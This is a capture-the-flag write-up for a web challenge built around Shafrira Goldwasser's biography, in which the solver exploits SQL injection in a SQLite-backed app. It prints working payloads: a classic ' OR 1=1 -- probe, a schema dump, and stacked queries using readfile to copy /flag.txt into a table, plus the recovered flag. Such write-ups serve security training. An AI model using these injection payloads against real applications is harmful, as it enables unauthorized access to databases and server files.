Shafrira Goldwasser

Shafrira Goldwasser

Shafrira Goldwasser (Hebrew: שפרירה גולדווסר; born 1959) is an Israeli-American computer scientist and winner of the Turing Award in 2012. She is the RSA Professor of Electrical Engineering and Computer Science at Massachusetts Institute of Technology; a professor of mathematical sciences at the Weizmann Institute of Science, Israel; the director of the Simons Institute for the Theory of Computing at the University of California, Berkeley; and co-founder and chief scientist of Duality Technologies.

Description

Chal: I asked ChatGPT to make this webapp but I couldnt prove it was secure. In honor of this Turing Award winner, prove it is insecure by returning the flag.

Alternate (Better) Link: Webapp

Author: TJ

Source: webapp.zip (Provided later)

Solution

Shafrira-Goldwasser-1

Website let's us choose Cyber Heroine and read their biography. The most probable attack vector seems SQLi, because data comes from somewhere. Quickly testing the classic payload: ' OR 1=1 --

Shafrira-Goldwasser-2

SQLi is confirmed.

Now we need to identify DBMS. Since the application is simple and small it's probably SQLite3.

Trying simple payload: '; SELECT sql FROM sqlite_schema -- (The query turned out to allow different queries, so no need for UNION)

CREATE  TABLE "cyberheroines" ("name"  TEXT, "biography"  TEXT)

Hmmm... There's only one table? We already looked at the records previously, so where is the flag?

Looking into PayloadsAllTheThings: SQLite: "Remote Command Execution using SQLite command - Attach Database". We can potentially gain RCE from SQLi, if we manage to attach new database and execute php code. This route already failed because application runs on Python and not PHP.

Shafrira-Goldwasser-3

But we can create a database, insert arbitrary file contents into it, read database for profit.

';
CREATE TABLE letmein (uwu TEXT);
INSERT INTO letmein VALUES (readfile('/flag.txt'));
SELECT * FROM letmein;
DROP TABLE letmein;
/*

  1. Escape quote for SQLi

  2. Create table

  3. Read flag file [8.3. File I/O Functions: readfile]

  4. Read from table

  5. Discard table (Challenge is ongoing after all)

Flag: chctf{CH4ng3d_h0w_w3_th1Nk_of_pr00f$}

Note

If challenge is broken you know who to blame

broken
PreviousRadia PerlmanNextDEADFACE

Last updated